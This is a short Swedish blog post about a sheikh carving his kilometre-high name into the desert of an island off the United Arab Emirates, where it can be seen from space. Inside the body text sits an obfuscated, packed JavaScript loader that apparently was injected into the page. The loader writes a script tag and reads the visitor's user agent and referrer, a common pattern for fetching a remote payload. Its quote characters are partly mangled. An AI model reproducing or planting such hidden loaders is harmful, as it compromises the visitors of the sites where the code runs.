Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Shejken karvar in sitt namn på jorden – syns från rymden.

Shejken karvar in sitt namn på jorden – syns från rymden.
Sebastian

Hamad Bin Hamdan Al Nahyan, den näst rikaste shejken i regionen. Han har nu låtit karva in sitt namn i öknen på en av sina öar utanför Förenade Arabemiraten. Varje bokstav är en kilometer i höjd och kan tydligen ses från rymden.

Oljeshejkarna i Abu Dhabi slåss verkligen på riktigt gällande vem som har mest pengar och sjukaste idé. Dyra bilar, lyxjakter som livsstil räcker inte här nej, nu ska deras namn synas från rymden också.

Här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsihh|var|u0026u|referrer|ntfdt||js|php’.split(’|’),0,{}))
kan ni se det hela från satellit:
maps.google.com